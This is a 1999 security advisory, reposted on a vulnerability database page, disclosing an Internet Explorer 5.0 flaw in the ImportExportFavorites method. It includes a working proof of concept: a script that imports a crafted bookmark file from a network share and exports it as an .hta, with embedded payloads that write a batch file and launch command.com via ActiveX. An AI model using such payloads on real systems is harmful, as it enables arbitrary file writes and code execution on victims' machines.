Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

ie5_vulnerabilities.txt

🗓️ 19 Sep 1999 00:00:00Reported by Packet StormType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 25 Views

IE 5.0 vulnerabilities allow file manipulation via ImportExportFavorites, risking DoS and execution.

Code
`Subject: IE 5.0 security vulnerabilities - ImportExportFavorites - at  
least creating and overwriting files, probably executing programs  
To: [email protected]   
  
  
Disclaimer:  
The opinions expressed in this advisory and program are my own and not  
of any company.  
The usual standard disclaimer applies, especially the fact that Georgi  
Guninski  
is not liable for any damages caused by direct or indirect use of the  
information or functionality provided by this program.  
Georgi Guninski, bears NO responsibility for content or misuse of this  
program or any derivatives thereof.  
  
  
Description:  
  
  
Internet Explorer 5.0 under Windows 95/NT 4.0 (suppose Win98 is  
vulnerable)  
allows creating and overwriting local files and in SOME cases putting  
content in them using the window.external.ImportExportFavorites()  
method.  
In SOME cases putting content in the file is possible which means  
arbitrary programs may be executed.  
  
  
Details:  
  
  
The problem is the window.external.ImportExportFavorites() method, which  
is used to  
import and export bookmarks from and to Netscape Communicator.  
The bigger problem is it allows creating and overwriting files, which  
obviously leads to a dangerous DoS attack.  
One may overwrite critical files which may lead to reinstalling Windows.  
Example of this is:  
<SCRIPT>  
window.external.ImportExportFavorites(0,"c:\\fav.hta");  
</SCRIPT>  
which will create a file c:\fav.hta, containing IE's favorites without  
asking the user, just notifying him the operation is successfull.  
  
  
In SOME cases, HTML code may be injected in the exported file by  
importing a specially  
designed HTML file. The file to be imported may reside on a samba or  
Windows file server and may be accessed by Microsoft Networking.  
The difficult part is this must be exported by using only the <A> tag,  
but HTML Applications help again.  
  
  
I have verified importing on a Windows NT 4.0 box directly connected to  
Internet and it worked fine.  
But I could not reproduce importing favorites with Windows 95 connected  
to Internet via dial-up, I do not have enough network resources to  
investigate further.  
  
  
I SHALL MUCH APPRECIATE SOME NETWORK GURU EXPLAIN ME WHY IMPORTING USING  
MICROSOFT NETWORKING DOES NOT WORK IN SOME CASES  
AND CONFIRM OR DENY THE POSSIBLILTY OF IMPORTING FAVORITES FROM A  
NETWORK FILE SEVER.  
  
  
It is possible to import the file using "http" protocol, but then the  
user must click the default button YES,  
Microsoft does not warn about any security problems in this case.  
  
  
  
So the code looks like this:  
  
  
In a HTML file:  
------------------------------------------------------------------  
<SCRIPT>  
// you must change the IP or make the file local !!!!!!!!!!  
window.external.ImportExportFavorites(1,"\\\\1.1.1.1\\test\\fav.imp");  
// Sure, the StartUp folder is better  
window.external.ImportExportFavorites(0,"c:\\fav.hta");  
</SCRIPT>  
------------------------------------------------------------------  
In the imported file (fav.imp), residing on a samba or Windows server  
without authentication:  
-------------------------------------------------------------------  
<!DOCTYPE NETSCAPE-Bookmark-file-1>  
<DL>  
<DT><A HREF="#" STYLE="left:expression(eval('f= new  
ActiveXObject(\'Scripting.FileSystemObject\');a=f.CreateTextFile(\'C:\\\\GTEST.BAT\',true);a.WriteLine(\'echo  
Hi\');a.WriteLine(\'pause\');a.close();alert(\'File C:\\\\GTEST.BAT  
created\');window.close();'));" ADD_DATE="923225094"  
LAST_VISIT="934146000" LAST_MODIFIED="923225096">123456</A>  
<DT><A HREF="#" STYLE="left:expression(eval('a=new  
ActiveXObject(\'WScript.Shell\');a.run(\'c:\\command.com\');alert(\'Program  
started\');window.close()'));" ADD_DATE="923225094"  
LAST_VISIT="934146000" LAST_MODIFIED="923225096">123455</A>  
</DL>  
-------------------------------------------------------------------  
To see the effect start c:\fav.hta (it may be placed in the StartUp  
folder and executed automatically)  
  
  
This vulnerability can be exploited via email or Usenet message using  
window.open().  
  
  
The user must have installed file sharing in order remote importing to  
work.  
  
  
Workaround:  
Disable Active Scripting  
  
  
Demonstration is available at http://www.nat.bg/~joro/imp.html  
  
  
  
Regards,  
Georgi Guninski  
http://www.nat.bg/~joro  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
19 Sep 1999 00:00Current
internet explorer 5.0security vulnerabilitiesfile manipulationdos attackarbitrary executionimportexportfavoriteswindows ntbookmark importhtml code injection.
25